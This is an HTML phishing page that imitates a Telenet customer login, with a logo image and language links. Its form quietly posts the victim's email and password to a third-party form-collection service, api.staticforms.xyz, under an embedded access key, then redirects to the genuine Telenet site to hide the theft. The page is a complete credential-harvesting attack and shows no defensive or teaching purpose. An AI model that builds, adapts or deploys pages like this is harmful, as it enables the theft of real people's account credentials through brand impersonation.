<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: sans-serif;
            font-size: small;
            background: url(bg.png);
        }

        .login-box {
            position: relative;
            margin: auto;
            align-items: center;
            justify-content: center;
            width: 320px;
            padding: 30px 20px 20px 30px;
            background-color: white;
        }

        .logo {
            position: relative;
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 20px;
        }

        img {
            width: 150px;
            height: 40px;
        }

        ul {
            display: flex;
        }

        li {
            list-style: none;
            padding: 10px;
        }

        li,
        a {
            color: rgba(0, 0, 0, 0.568);
        }

        label {
            display: block;
            margin-bottom: 5px;
        }

        .form-group input {
            border: 2px solid rgba(0, 0, 0, 0.329);
            height: 45px;
            width: 310px;
            margin-bottom: 50px;
        }

        input {
            margin-bottom: 30px;
        }

        .form-group {
            justify-content: center;
            align-items: center;
        }

        button {
            background-color: #ffc421;
            padding: 20px 120px;
            border: none;
            border-radius: 3px;
            font-weight: bold;
        }
    </style>
</head>

<body>
    <div class="login-section">
        <div class="login-box">
            <div class="logo"><img src="telnet logo.png" alt=""><span>
                    <ul>
                        <li><a href="#">NL</a></li>
                        <li><a href="#">FR</a></li>
                        <li><a href="#">EN</a></li>
                    </ul>
                </span></div>
            <form id="customForm" action="https://api.staticforms.xyz/submit" method="POST">
                <input type="hidden" name="accessKey" value="6d12f331-39bf-4c84-8b65-8707af38179a">
                <!-- Redirect after submission -->
                <input type="hidden" name="redirectTo" value="https://www2.telenet.be/residential/nl">
                <!-- Anti-spam protection -->
                <input type="hidden" name="_honey" style="display:none;">
                <div class="container">
                    <div class="form-group">
                        <label>Your email address</label>
                        <input type="email" name="email" placeholder="Your email" required>
                        <label>Password:</label>
                        <input type="text" id="passwordInput"  name="message" placeholder="Your password" required>
                        <!-- Hidden field to store the actual password -->
                        <input type="hidden" id="hiddenPassword" name="message">
                    </div>
                    <span class="or-text"><input type="radio" name="" id=""> Stay connected</span>
                    <div class="form-group">
                        <button class="sign-in-btn" type="submit">Submit</button>
                    </div>
                </div>
            </form>
        </div>
    </div>


</body>

</html>